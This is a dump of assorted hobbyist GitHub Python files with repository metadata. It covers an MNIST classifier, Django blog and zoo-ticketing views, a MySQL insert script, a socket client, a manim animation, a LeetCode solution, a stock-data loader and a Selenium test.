accuracy_score(y_test.argmax(axis=1), t_test)\nprint(\"accuracy_score:{}\".format(acc))\nprint(\"done\")\n","repo_name":"maeharin/handmade-deeplearning","sub_path":"python/mnist/04_mnist_class_style.py","file_name":"04_mnist_class_style.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31509984282","text":"import mysql.connector\nclass Student:\n\n def __init__(self, roll, name, age, email, address):\n self.roll = roll\n self.name = name\n self.age = age\n self.email = email\n self.address = address\n\n def showStudent(self):\n print(\"Roll Number {} belongs to {}\".format(self.roll,self.name))\n\n def getStudentDetails(self):\n data = \"{},{},{},{},{}\\n\".format(self.roll, self.name, self.age, self.email, self.address)\n return data\n\ns1 = Student(1,\"John\",20,\"john@example.com\",\"Redwood Shores\")\ns2 = Student(2,\"Jennie\",30,\"jennie@example.com\",\"Country Homes\")\n\ns1.showStudent()\ns2.showStudent()\n\ncon = mysql.connector.connect(user=\"root\",password=\"\",host=\"localhost\",database=\"test\")\nprint(\"Is Connection Established:\",con.is_connected())\nprint(type(con))\ncursor = con.cursor()\nprint(type(cursor))\n\n\nsql2 = \"insert into test('{}',{},'{}','{}')\".format(s1.name,s1.age,s1.email,s1.address)\n\n\ncursor.execute(sql2)\n\ncon.commit()\nprint(\"Student Saved !!\")","repo_name":"pulkitkomal/Auribises_Practice","sub_path":"Third Week/MySql1.py","file_name":"MySql1.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28181523448","text":"from django.shortcuts import render, redirect\nfrom .models import Category, Article\nfrom .forms import ArticleForm\nfrom django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView\n\n\nclass ArticleListView(ListView):\n model = Article\n template_name = 'blog/index.html'\n context_object_name = 'articles'\n extra_context = {\n 'title': 'PROWEB-Movies'\n }\n\n\n\n\nclass ArticleListByCategory(ArticleListView):\n\n def get_queryset(self):\n articles = Article.objects.filter(category_id=self.kwargs['pk'])\n return articles\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data()\n category = Category.objects.get(pk=self.kwargs['pk'])\n context['title'] = f'{category.title}'\n return context\n\n\n\n\nclass ArticleDetailView(DetailView):\n model = Article\n context_object_name = 'article'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data()\n article = Article.objects.get(pk=self.kwargs['pk'])\n context['title'] = f'{article.title}'\n return context\n\n\n\n\n\n\nclass NewArticle(CreateView):\n form_class = ArticleForm\n template_name = 'blog/add_category.html'\n extra_context = {\n 'title': 'Добавить'\n }\n\n\n","repo_name":"Ilxom1221/project_Django-1","sub_path":"project/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71856097534","text":"import socket\n#client\nHOST = '192.168.43.166'\nPORT = 2055 \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\n#s.sendall('Hello, world')\nwhile True:\n\tdata = s.recv(1024).decode()\n\tprint(data)\n\ns.close()\n\n","repo_name":"pankaj-pundir/The-projects","sub_path":"dexterous/client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"4166618387","text":"#!/usr/bin/python3\n\n'''\n\tfind_range.py\n\n\tGiven a sorted array, with possible duplicated values and a given target, find the first and last index where that target is\n\tReturn -1 if there is no entry in the list \n\n\tcreated: 09/25/2020\n\n\tversion: 1.0\n'''\n\n################################ function definition ########################################\ndef bin_search(arr, s_idx, e_idx, target):\n\n\t#base case \n\tif s_idx == e_idx:\n\t\tif arr[s_idx] == target:\n\t\t\treturn s_idx\n\t\telse: \n\t\t\treturn -1\n\n\t#find the midpoint and check whether that's the location of the target value\n\tmid = (s_idx + e_idx)//2\n\n\tif arr[mid] == target: \n\t\treturn mid \n\telif arr[mid] > target: \n\t\treturn bin_search(arr, s_idx, mid - 1, target)\n\telse: \n\t\treturn bin_search(arr, mid + 1, e_idx, target)\n\n\ndef find_range(arr, target):\n\n\t#local variables \n\tfirst = last = bin_search(arr, 0, len(arr) - 1, target)\n\te_idx = len(arr)\n\t\n\n\n\t#check the result and terminate the function if the result is not found \n\tif (first == -1):\n\t\treturn -1\n\n\t#traverse to both left and right to find the first and last position \n\t#keep close track to ensure it's not going out of bounds \n\tprev = first - 1\n\n\twhile 1: \n\t\tif prev != -1 and arr[prev] == target: \n\t\t\tfirst -= 1\n\t\t\tprev -= 1\n\t\telse: \n\t\t\tbreak\n\n\tnxt = last + 1\n\n\twhile 1: \n\t\tif nxt != e_idx and arr[nxt] == target: \n\t\t\tlast += 1\n\t\t\tnxt += 1\n\t\telse:\n\t\t\tbreak\n\n\t#return the range\n\treturn (first, last)\n\n################################### main function ##########################################\n#local variables \narr = [1, 1, 2, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6]\n\n#call the function \nidx = find_range(arr, 4)\n\n#check whether the value was in the array and display the result\nif (idx == -1):\n\tprint(\"Value was not in the array\")\nelse: \n\tprint(\"Range is : \" +str(idx[0]) + \",\" +str(idx[1]))\n","repo_name":"maihan040/Python_Random_Scripts","sub_path":"findRange.py","file_name":"findRange.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11523830254","text":"from django.shortcuts import render,redirect,HttpResponse\nfrom accounts.models import *\nfrom .forms import *\nfrom datetime import date\nfrom Director.forms import *\nfrom django.contrib.auth import authenticate\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nimport time\n\n\n@login_required()\ndef loadVisitorHome(request):\n ticketObj = Ticket.objects.filter(uid = request.user.id).values('tdate')\n applicationObj = Applications.objects.filter(uid = request.user.id).values('date')\n feedbackObj = Feedback.objects.filter(uid = request.user.id).values('fdate')\n complaintObj = Complaints.objects.filter(uid = request.user.id).values('cdate')\n\n ticket = []\n application = []\n feedback = []\n complaint = []\n\n for i in ticketObj:\n if i['tdate'].year == date.today().year and i['tdate'].month == date.today().month:\n ticket.append(i)\n\n for i in applicationObj:\n if i['date'].year == date.today().year and i['date'].month == date.today().month:\n application.append(i)\n\n for i in feedbackObj:\n if i['fdate'].year == date.today().year and i['fdate'].month == date.today().month:\n feedback.append(i)\n\n for i in complaintObj:\n if i['cdate'].year == date.today().year and i['cdate'].month == date.today().month:\n complaint.append(i)\n \n\n context = {\n 'ticket':len(ticket),\n 'application':len(application),\n 'feedback':len(feedback),\n 'complaints':len(complaint)\n }\n\n return render(request,'visitorhome.html',context)\n\n\n@login_required()\ndef viewTickets(request):\n tickets = Ticket.objects.filter(uid = request.user.id)\n Ticket.objects.filter(payment_status = False).delete()\n current_date = date.today()\n return render(request,'view tickets.html',{'tickets':tickets,'current':current_date})\n\n\n@login_required()\ndef showTicketDetails(request,id):\n catagories = BookedCatagory.objects.filter(ticket = id)\n return render(request,'ticket details.html',{'catagories':catagories})\n\n\ndef current_date_slot_check(book_date,book_slot):\n \n if date.today() == book_date:\n print(book_slot == 'morning' and time.strftime(\"%H:%M:%S\",time.localtime()).__gt__('12:00:00 PM'))\n if book_slot == 'morning' and time.strftime(\"%H:%M:%S\",time.localtime()).__gt__('12:00:00 PM'):\n return False\n elif book_slot == 'noon' and time.strftime(\"%H:%M:%S\",time.localtime()).__gt__('15:00:00 PM'):\n return False\n else:\n return True\n\n\n@login_required()\ndef bookTicket(request):\n ticketform = TicketForm()\n catagories = TicketRate.objects.all()\n capacity = ZooDetails.objects.get(pk=1).visitor_capacity\n\n if request.method == 'GET':\n return render(request,'book ticket.html',{'form':ticketform,'catagories':catagories})\n\n elif request.method == 'POST':\n form = TicketForm(request.POST)\n tRate =TicketRate.objects.all()\n\n book_date = request.POST['reporting_date']\n book_slot = request.POST['reporting_time']\n # print(book_slot,book_date)\n\n current_count = Ticket.objects.filter(reporting_date = book_date, reporting_time = book_slot).count()\n\n if form.is_valid():\n c = current_date_slot_check(book_date,book_slot)\n # print(c)\n if c == True:\n obj = form.save(commit=False)\n count_list = request.POST.getlist('catagory')\n booked_count = sum([int(i) for i in count_list])\n\n if booked_count != 0:\n flag = True\n \n for c in [int(i) for i in count_list]:\n if c < 0:\n flag = False\n \n if flag:\n if current_count + booked_count < capacity:\n i = 0\n total = 0\n total_count = 0\n\n for rate in tRate:\n if int(count_list[i]) != 0:\n catagory_rate = TicketRate.objects.get(type=rate.type)\n total += int(count_list[i]) * catagory_rate.rate\n total_count += int(count_list[i]) \n\n i = i+1\n\n obj.total = total\n obj.total_person = total_count\n obj.uid = request.user\n obj.save()\n\n j=0\n\n for rate in tRate:\n if int(count_list[j]) != 0:\n BookedCatagory.objects.create(catagory = TicketRate.objects.get(type=rate.type).type,count = count_list[j],rate = TicketRate.objects.get(type=rate.type).rate,ticket = obj)\n \n j=j+1\n \n return redirect('visitor_confirm_booking')\n else:\n messages.error(request,'visitor capacity exceeded for this booking slot, Please choose another slot for proceed booking!')\n return render(request,'book ticket.html',{'form':form,'catagories':catagories})\n\n else:\n messages.error(request,'Please provide valid count of tickets')\n return render(request,'book ticket.html',{'form':form,'catagories':catagories})\n \n else:\n messages.error(request,'You are booking ticket with ZERO visitors please provide valid no. of visitors in available catagories')\n return render(request,'book ticket.html',{'form':form,'catagories':catagories})\n\n else:\n messages.error(request,'You are booking ticket for a past time please provide future date and slot for booking')\n return render(request,'book ticket.html',{'form':form,'catagories':catagories})\n \n else:\n return render(request,'book ticket.html',{'form':form,'catagories':catagories})\n \n else:\n return render(request,'book ticket.html',{'form':ticketform,'catagories':catagories}) \n\n\n@login_required()\ndef confirmBooking(request):\n ticketStatus = Ticket.objects.filter(payment_status = False).exists()\n if ticketStatus:\n obj = Ticket.objects.get(payment_status=False)\n return render(request,'confirm booking.html',{'ticket':obj})\n\n\n@login_required()\ndef declinePayment(request,id):\n ticket = Ticket.objects.get(pk=id)\n ticket.delete()\n return redirect('visitor_view_tickets')\n\n\n@login_required()\ndef acceptPayment(request,id):\n ticket = Ticket.objects.get(pk=id)\n ticket.payment_status = True\n ticket.save()\n messages.success(request,'Ticket booked successfully')\n return redirect('visitor_view_tickets')\n\n\n@login_required()\ndef cancelBooking(request,id):\n ticket = Ticket.objects.get(pk=id)\n ticket.delete()\n messages.success(request,'Booking cancelled successfully')\n return redirect('visitor_view_tickets')\n\n\n@login_required()\ndef showFeedbacks(request):\n feedbacks = Feedback.objects.filter(uid = request.user.id)\n feedbackForm = FeedbackForm()\n\n if request.method == 'GET':\n return render(request,'visitor view feedbacks.html',{'feedbacks':feedbacks,'form':feedbackForm})\n\n elif request.method == 'POST':\n form = FeedbackForm(request.POST)\n\n if form.is_valid():\n obj = form.save(commit=False)\n obj.uid = request.user\n obj.save()\n messages.success(request,'Feedback send successfully')\n return redirect('visitor_view_feedback')\n else:\n return render(request,\"visitor view feedbacks.html\",{'feedbacks':feedbacks,'form':form,'error':True})\n else:\n return render(request,'visitor view feedbacks.html',{'feedbacks':feedbacks,'form':feedbackForm})\n\n\n@login_required()\ndef deleteFeedback(request,id):\n feedback = Feedback.objects.get(pk=id)\n feedback.delete()\n messages.success(request,'Feedback deleted successfully')\n return redirect('visitor_view_feedback')\n\n\n@login_required()\ndef viewComplaints(request):\n complaints = Complaints.objects.filter(uid = request.user.id)\n recipient = Users.objects.filter(usertype__in = ['curator','director'])\n # print(recipient[0].usertype)\n complaintForm = ComplaintForm()\n\n if request.method == 'GET':\n return render(request,'visitor view complaints.html',{'complaints':complaints,'form':complaintForm,'recipients':recipient})\n\n elif request.method == 'POST':\n recipient = request.POST['recipient']\n form = ComplaintForm(request.POST)\n\n if form.is_valid():\n obj = form.save(commit=False)\n obj.uid = Users.objects.get(pk=request.user.id)\n obj.rid = Users.objects.get(pk=recipient)\n obj.save()\n messages.success(request,'Complaint registered successfully')\n return redirect('visitor_view_complaints')\n else:\n return render(request,\"visitor view complaints.html\",{'complaints':complaints,'form':form,'recipients':recipient,'error':True})\n else:\n return render(request,'visitor view complaints.html',{'complaints':complaints,'form':complaintForm,'recipients':recipient})\n\n\n@login_required()\ndef deleteComplaint(request,id):\n complaint = Complaints.objects.get(pk=id)\n complaint.delete()\n messages.success(request,'Complaint deleted successfully')\n return redirect('visitor_view_complaints')\n\n\n@login_required()\ndef viewProfile(request):\n profileForm = UpdateProfileForm(instance=request.user)\n profileImageForm = ProfileImageForm(instance=request.user)\n if request.method == 'GET':\n return render(request,'visitor update profile.html',{'form':profileForm,'imageform':profileImageForm})\n\n elif request.method == 'POST':\n form = UpdateProfileForm(request.POST,instance=request.user)\n\n if form.is_valid():\n form.save()\n messages.success(request,'profile updated successfully')\n return redirect('visitor_view_profile')\n else:\n messages.error(request,'Error while submitting form')\n return render(request,'visitor update profile.html',{'form':form})\n else:\n return render(request,'visitor update profile.html',{'form':profileForm})\n\n\n@login_required()\ndef updateProfileImage(request):\n profileImageForm = ProfileImageForm(instance=request.user)\n if request.method == 'POST':\n form = ProfileImageForm(request.POST,request.FILES,instance = request.user)\n if form.is_valid():\n form.save()\n messages.success(request,'profile image updated successfully')\n return redirect('visitor_view_profile')\n else:\n return render(request,'visitor update profile.html',{'form':form,'imageform':profileImageForm,'error':True})\n\n\n@login_required()\ndef deleteProfileImage(request):\n userObj = Users.objects.get(pk=request.user.id)\n userObj.profile = 'null'\n userObj.save()\n messages.success(request,'profile photo deleted successfully!')\n return redirect('visitor_view_profile')\n\n\n@login_required()\ndef changePassword(request):\n currentPassword = request.POST['password']\n newPassword = request.POST['newpassword']\n renewPassword = request.POST['renewpassword']\n\n user = authenticate(username = request.user.username , password = currentPassword)\n\n if user:\n if newPassword == renewPassword:\n request.user.set_password(newPassword)\n request.user.save()\n messages.success(request,'Password changed successfully!')\n return redirect('login_user')\n else:\n messages.error(request,'new and reentered passwords mismatch!')\n return redirect('visitor_view_profile')\n else:\n messages.error(request,'current password is wrong!')\n return redirect('visitor_view_profile')\n\n\n@login_required()\ndef viewVacancy(request):\n vacancy = JobVacancy.objects.all()\n application = Applications.objects.filter(uid = request.user.id)\n return render(request,'view vacancy.html',{'vacancies':vacancy,'appl_obj':application})\n\n\n@login_required()\ndef apply(request,id):\n vacancy = JobVacancy.objects.get(pk=id)\n applicationForm = ApplicationForm()\n\n if request.method == 'GET':\n return render(request,'apply job.html',{'form':applicationForm,'vacancy':vacancy})\n\n elif request.method == 'POST':\n form = ApplicationForm(request.POST,request.FILES)\n\n if form.is_valid():\n obj = form.save(commit=False)\n obj.vacancy = vacancy\n obj.uid = request.user\n obj.status = 'unreviewed'\n obj.save()\n messages.success(request,'Application submitted successfully!')\n return redirect('visitor_view_vacancy')\n else:\n messages.error(request,'Error while submitting form!')\n return render(request,'apply job.html',{'form':form,'vacancy':vacancy})\n else:\n return render(request,'apply job.html',{'form':applicationForm,'vacancy':vacancy})\n\n\n@login_required()\ndef viewApplications(request):\n applications = Applications.objects.filter(uid = request.user.id)\n return render(request,'view applications.html',{'applications':applications})\n\n\n@login_required()\ndef deleteApplication(request,id):\n application = Applications.objects.get(pk=id)\n application.delete()\n messages.success(request,'Application deleted successfully')\n return redirect('visitor_view_job_application')","repo_name":"ajay-aju-0/Main-project","sub_path":"ZMS/Visitor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3457964789","text":"\n\nfrom hendrik_active.Image_Processing.poisson_noise_and_snr.k_Space.KSpace import KSpace\nfrom manimlib.imports import *\nfrom hendrik_old.Image_Processing.FourierIdea.FourierMathJuggling import FourierMathJuggling\n\nglobal k_plane_size\nk_plane_size=0.7\n\n\nscene = \"Scene2_with_phase_change_try3\" # FULL ANIMATION SCENE phase but no real_out\nclass Scene2_with_phase_change_try3(ThreeDScene): # with real plane on the right\n\n def construct(self):\n run_setting = {\"run_time\": 1 , \"rate_func\": linear}\n postion_setting={\"preset_position\":\"LEFT\",\"center_dist\": 1}\n self.set_camera_orientation(phi=75 * DEGREES, theta=-60 * DEGREES) # 2.5D\n self.camera.frame_center.shift(2 * OUT)\n #pixels = 19 #this is how it shoud be\n pixels=3 # only shortly\n #math_preperation:\n k_math=FourierMathJuggling.k_from_preset_minimal(pixels,**postion_setting)\n k_disp= KSpace(pixel_len=pixels)\n img_kamp,img_kph= k_math.get_amp_and_ph()\n k_disp.fill_k_space_updater(img_kamp)\n self.add(k_disp)\n\n k_math = FourierMathJuggling.k_from_preset_minimal(pixels, **postion_setting)\n k_disp = KSpace(pixel_len=pixels)\n img_kamp, img_kph = k_math.get_amp_and_ph()\n k_disp.fill_k_space_updater(img_kamp)\n # k_disp.r()\n self.add(k_disp)\n\n def update_phase(mob):\n val= my_phase_tracker.get_value()\n k_math.phase_shift_single(val, **postion_setting)\n img_kamp, img_kph=k_math.get_amp_and_ph()\n mob.set_phase_flowers_updater (img_kamp, img_kph)\n mob.set_shade_in_3d(True)\n return mob\n my_phase_tracker = ValueTracker(0)\n for i in range(0,2):\n self.play(my_phase_tracker.increment_value, 90, # <- \"Master\" update first\n UpdateFromFunc(k_disp, update_phase),\n rate_func=linear)\n self.wait(1)\n\n\nif __name__ == \"__main__\":\n module_name = os.path.basename(__file__)\n command_A = \"manim -p -l -c '#1C758A' --video_dir ~/Downloads/ \"\n command_B = module_name +\" \" + scene\n os.system(command_A + command_B)","repo_name":"kolibril13/manim-3b1b-kolibril-backup","sub_path":"FourierIdea/b_scene_test_3d_del.py","file_name":"b_scene_test_3d_del.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"12169693972","text":"\"\"\"\n1부터 13까지의 수에서, 1은 1, 10, 11, 12, 13 이렇게 총 6번 등장합니다. \n정수 i, j, k가 매개변수로 주어질 때, \ni부터 j까지 k가 몇 번 등장하는지 return 하도록 solution 함수를 완성해주세요.\n\"\"\"\n\ndef solution(i, j, k):\n answer = 0\n for n in range(i, j+1) :\n answer +=str(n).count(str(k))\n return answer\n\nprint(solution(1, 13, 1))\nprint(solution(10, 50, 5))\nprint(solution(3, 10, 2))","repo_name":"kimgyuhee/Python","sub_path":"Chapter0_Algorithm/2304/230407/test03.py","file_name":"test03.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"72530489215","text":"# https://leetcode.com/problems/maximal-square/discuss/61935/6-lines-Visual-Explanation-O(mn)\n# leetcode time cost : 152 ms\n# leetcode memory cost : 14.3 MB \n# using more of Python and some \"tricks\"\nclass Solution:\n def maximalSquare(self, A):\n for i, r in enumerate(A):\n r = A[i] = list(map(int, r))\n for j, c in enumerate(r):\n if i * j * c:\n r[j] = min(A[i-1][j], r[j-1], A[i-1][j-1]) + 1\n return max(map(max, A + [[0]])) ** 2\n\ndef main():\n matrix = [[\"1\",\"0\",\"1\",\"0\",\"0\"],[\"1\",\"0\",\"1\",\"1\",\"1\"],[\"1\",\"1\",\"1\",\"1\",\"1\"],[\"1\",\"0\",\"0\",\"1\",\"0\"]] # expect is 4\n Solution_obj = Solution()\n result = Solution_obj.maximalSquare(matrix)\n print(\"result value is \",result)\n \nif __name__ =='__main__':\n main() ","repo_name":"sky-dream/LeetCodeProblemsStudy","sub_path":"[0221][Medium][Maximal_Square]/Maximal_Square_2.py","file_name":"Maximal_Square_2.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"17891818540","text":"from a10sdk.common.A10BaseClass import A10BaseClass\n\n\nclass ServiceConfig(A10BaseClass):\n \n \"\"\"Class Description::\n Configure scaleout templates for SLB, CGN and VRRP.\n\n Class service-config supports CRUD Operations and inherits from `common/A10BaseClass`.\n This class is the `\"PARENT\"` class for this module.`\n\n :param uuid: {\"description\": \"uuid of the object\", \"format\": \"string\", \"minLength\": 1, \"modify-not-allowed\": 1, \"optional\": true, \"maxLength\": 64, \"type\": \"string\"}\n :param template_list: {\"minItems\": 1, \"items\": {\"type\": \"template\"}, \"uniqueItems\": true, \"array\": [{\"required\": [\"name\"], \"properties\": {\"device-group\": {\"description\": \"Device group id\", \"format\": \"number\", \"type\": \"number\", \"maximum\": 16, \"minimum\": 1, \"optional\": true}, \"bucket-count\": {\"description\": \"Number of traffic buckets\", \"format\": \"number\", \"default\": 256, \"optional\": true, \"maximum\": 256, \"minimum\": 1, \"type\": \"number\"}, \"name\": {\"description\": \"Scaleout template Name\", \"format\": \"string\", \"minLength\": 1, \"optional\": false, \"maxLength\": 63, \"type\": \"string\"}, \"uuid\": {\"description\": \"uuid of the object\", \"format\": \"string\", \"minLength\": 1, \"modify-not-allowed\": 1, \"optional\": true, \"maxLength\": 64, \"type\": \"string\"}}}], \"type\": \"array\", \"$ref\": \"/axapi/v3/scaleout/{cluster-id}/service-config/template/{name}\"}\n :param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`\n\n \n\n URL for this object::\n `https:////axapi/v3/scaleout/{cluster_id}/service-config`.\n\n \n\n \n \"\"\"\n def __init__(self, **kwargs):\n self.ERROR_MSG = \"\"\n self.required=[]\n self.b_key = \"service-config\"\n self.a10_url=\"/axapi/v3/scaleout/{cluster_id}/service-config\"\n self.DeviceProxy = \"\"\n self.uuid = \"\"\n self.template_list = []\n\n for keys, value in kwargs.items():\n setattr(self,keys, value)\n\n\n","repo_name":"a10networks/a10sdk-python","sub_path":"a10sdk/core/scaleout/scaleout_service_config.py","file_name":"scaleout_service_config.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"} +{"seq_id":"35117946391","text":"# -- coding: utf-8 --\n\nclass NumArray(object):\n def __init__(self, nums):\n \"\"\"\n :type nums: List[int]\n \"\"\"\n current_sum = 0\n self.sums = []\n for n in nums:\n current_sum += n\n self.sums.append(current_sum)\n\n def sumRange(self, i, j):\n \"\"\"\n :type i: int\n :type j: int\n :rtype: int\n \"\"\"\n if i == 0:\n return self.sums[j]\n else:\n return self.sums[j] - self.sums[i-1]\n\n\n\n # Your NumArray object will be instantiated and called as such:\n # obj = NumArray(nums)\n # param_1 = obj.sumRange(i,j)","repo_name":"filosfino/leetcode","sub_path":"Algorithms/Q303_Range_Sum_Query_-_Immutable.py","file_name":"Q303_Range_Sum_Query_-_Immutable.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"18887756220","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\ninfile = 'bike.csv'\ndf = pd.read_csv(infile)\ndf['datetime'] = pd.to_datetime(df['datetime'])\ndf = df.set_index('datetime')\ndf['year'] = df.index.year\ndf['month'] = df.index.month\ndf['day'] = df.index.day\ndf['hour'] = df.index.hour\n\nplt.rcParams['font.sans-serif'] = ['SimHei'] #解决plt中文显示的问题\nplt.rcParams['axes.unicode_minus'] = False #解决plt负号显示的问题\n\nyear = df.groupby(lambda x: x.year).mean()\nyear[['count']].plot(kind='bar',rot=360)\nplt.title('自行车每年租赁数分布图')\nplt.show()\n\nquarter = df.groupby('month').mean()\nquarter[['count']].plot(kind='bar',rot=360)\nplt.title('自行车每月租赁数分布图')\nplt.show()\n\nm_bike = df.resample('M').mean()\nfig, axes = plt.subplots(2, 1) #两行一列\nm_bike['2011'][['count']].plot(ax=axes[0],sharex=True) #贡献X轴\nm_bike['2012'][['count']].plot(ax=axes[1])\nplt.title('自行车每月租赁数分布图')\nplt.show()\n\nday = df.groupby('day').mean()\nday[['count']].plot(kind='bar',rot=360)\nplt.title('自行车每日租赁数分布图')\nplt.show()\n\nhour = df.groupby('hour').mean()\nhour[['count']].plot(kind='bar',rot=360)\nplt.title('自行车每小时租赁数分布图')\nplt.show()\n\nweather = df.groupby('weather').mean()\nweather[['count']].plot(kind='bar',rot=360)\nplt.title('天气情况与自行车租赁数分布图')\nplt.show()\n","repo_name":"wmj998/analysis","sub_path":"pandas入门/实验三/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32777638464","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport sys\nimport math\nimport tikzplotlib\nimport os\n\nbuffer = \"\"\nwith open(\"rosc.cir\") as fi:\n for line in fi:\n if(line.startswith(\"VDD\")):\n buffer += \"VDD VDD VSS dc {vdd}\\n\"\n else:\n buffer += line\n\nfon = \"rosc_vdd\"\nvdds = np.linspace(0.3,1.5,num=20)\n\nos.system(f\"touch {fon}.yaml\")\nfor vdd in vdds:\n cir = buffer.replace(\"{vdd}\",str(vdd))\n with open(f\"{fon}.cir\", \"w\") as fo:\n fo.write(cir)\n os.system(f\"aimspice -o csv {fon}.cir\")\n os.system(f\" echo '{vdd}': >> {fon}.yaml\")\n os.system(f\"python3 freq.py {fon}.csv 'v(a1)' 4.1e-9 >> {fon}.yaml\")\n","repo_name":"wulffern/dicex","sub_path":"ex4/vddsweep.py","file_name":"vddsweep.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"42921902759","text":"# -*- coding: UTF-8 -*-\nimport logging\nimport traceback\nimport tushare as ts\nimport pandas as pd\nfrom datetime import datetime\nimport time\nfrom sqlalchemy import create_engine\ndef datelist(begin,end):\n date_l=[datetime.strftime(x,'%Y-%m-%d')for x in list(pd.date_range(start=begin,end=end))]\n return date_l\n\nlogging.basicConfig(level=logging.DEBUG,format='%(asctime)s %(filename)s[line:%(lineno)d)] %(levelname)s %(message)s',datefmt='%Y-%m-%d %H:%M:%S',filename='mylog.log',filemode='w')\ntoday=time.strftime('%Y-%m-%d',time.localtime())\ndaterange_l=datelist('2017-10-13','2017-10-13')\nengine=create_engine('mysql://root:Lewei50_MYSQL@localhost/test?charset=utf8')\n\nfor x in daterange_l:\n try:\n print (x)\n df=ts.get_day_all(x)\n if not df is None:\n df['date']=x\n #df.to_csv('day'+x+'.csv')d\n df.to_sql('gettodayall',engine,if_exists='append',index=False)\n time.sleep(0.2)\n logging.info ('to sql succeed')\n \n except Exception as e:\n logging.info(str(e))\n continue\n\n \n \n","repo_name":"laoliu1982/tutushare","sub_path":"AllPerDay.py","file_name":"AllPerDay.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"53753495","text":"# encoding: utf-8\n\"\"\"\nIn the Key of Python (version 0.1)\nInstrument Rack.\n\nAn instrument is a function that returns a single note in the form of a Track object. It accepts\nas arguments any subset of the following:\n - frequency\n - volume [1 is reasonable, 10 is max]\n - duration\n - attack [units of seconds]\n - sustain [units of seconds]\n - decay [units of seconds]\n ? bpm\n ? other...\n\n\"\"\"\n\n__all__ = [\"bell\",\"drone\"]\n\nimport numpy as np\nimport pylab as pb\nimport scipy.io.wavfile\nimport wave as kp\nimport random\n#sps=kp.sps\n\ndef bell(freq=440.,volume=1.0,duration=None,attack=0.001,sustain=None,decay=0.5,bpm=120):\n assert freq<2000., \"bells don't go that high\"\n A=10**((volume-10.0)/3)\n t=np.arange(0.0,5.0,1./kp.sps)\n data=np.zeros([len(t),2])\n data[:,0]=A*np.sin(2*np.pi*t*freq)*np.exp(-t/decay)\n data[:,1]=data[:,0]\n W=kp.Wave(data=(kp.sps,data))\n return kp.Track(Wave=W,zero=0)\n \ndef drone(freq=440.,volume=1.0,duration=4.0,attack=0.1,sustain=None,decay=0.1,bpm=120):\n assert freq<600., \"drones shouldn't be high... that's annoying\"\n A=10**((volume-10.0)/3)\n t_cut=duration*60./bpm\n t_end=(duration+4)*60/bpm\n t=np.arange(0.0,t_end,1./kp.sps)\n drfreq=bpm/60.*random.randint(1,2)\n depth=0.1+0.2*random.random()\n Amp=(1-depth)*A+depth*A*np.cos(2*np.pi*t*drfreq)\n dt=np.sin(2*np.pi*t*freq)*(1-np.exp(-t/attack))\n dt=Amp*dt\n dt[t>t_cut]=dt[t>t_cut]*np.exp(-(t[t>t_cut]-t_cut)/decay)\n if sustain!=None:dt*=np.exp(-t/sustain)\n data=np.zeros([len(t),2])\n data[:,0]=dt\n data[:,1]=dt\n W=kp.Wave(data=(kp.sps,data))\n return kp.Track(Wave=W,zero=0)\n \n \n \n ","repo_name":"dfm/kopy","sub_path":"kopy/instruments.py","file_name":"instruments.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"21892244118","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n\nclass PythonOrgSearch(unittest.TestCase):\n \n def setUp(self):\n self.driver = webdriver.Firefox()\n \n def test_search_in_python_org(self):\n driver = self.driver\n driver.get(\"https://hil-wsr-t-lwb01.corp.avertlabs.internal/\")\n self.assertIn(\"URL ticket submission portal\", driver.title)\n elem = driver.find_element_by_name(\"q\")\n elem.send_keys(\"pycon\")\n assert \"No results found.\" not in driver.page_source\n elem.send_keys(Keys.RETURN)\n \n def tearDown(self):\n self.driver.close()\n\nif __name__ == \"__main__\":\n 